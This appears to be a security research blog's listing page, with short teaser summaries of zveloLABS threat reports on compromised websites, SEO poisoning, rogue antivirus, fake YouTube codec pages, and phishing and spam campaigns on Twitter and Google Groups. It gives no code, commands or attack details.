zveloLABS™ has detected a new widespread compromise, with tens of thousands of domains infected. Cybercriminals have used stolen credentials, placing specially crafted pages into legitimate websites that lead visitors to malicious payloads.
zveloLABS™ have been tracking a new campaign by cybercrooks, compromising and creating websites for use in SEO poisoning and malware distribution. Thousands of these sites have been detected which use elaborate techniques to trick search engines and are ready to serve malware in an instant.
Network administrators and businesses install web filtering on networks for a variety of reasons ranging from compliance and legal requirements to worker productivity issues. To gain some insight, zvelo surveyed network administrators, customers, readers, and security professionals to identify the most important drivers behind web filtering. Below are the results:
This post is for those users who are not already familiar with this widespread and common threat known as “Rogue AV,” or fake antivirus software.
Researchers see this code in HTML source so often that it almost never gets a second glance – until now. zveloLABS™ researchers have seen several compromised sites recently using Google Analytics to mask malicious scripts, as in the example below.
A new twitter spam campaign is making rounds, infecting users with rogue anti-virus malware. The spam mail attempts to convince the user that someone was trying to steal their Twitter account information, and to download a “secure module” to protect their account.
zveloLABS™ has uncovered thousands of compromised web servers hosting fake YouTube pages. Attempting to play the video on these fake pages prompts the user to install a ‘media codec’ which then infects the machine with malware.
In the security community, little attention is paid to compromised websites that don’t serve up malware. The malicious URL lists maintained by the anti-virus companies, by Google, and by nearly every other source of malicious URLs rely on anti-virus to trigger on exploits and malware to determine if a site is malicious. In a few select cases, behavioral analysis may be used to determine if a visit to a website will lead to an infected computer.
The newest phishing scam on Twitter has snared thousands of users hoping to increase their number of followers. Instead, users are sent off to a phishing page where cybercriminals steal their Twitter logins using them to generate more spam.
zveloLABS™ researchers have been tracking a recent campaign abusing Google Groups to spread malicious links in Spam emails. Users following the link are infected with a Downloader Trojan, silently infecting the machine with various types of malware including Rogue AntiVirus.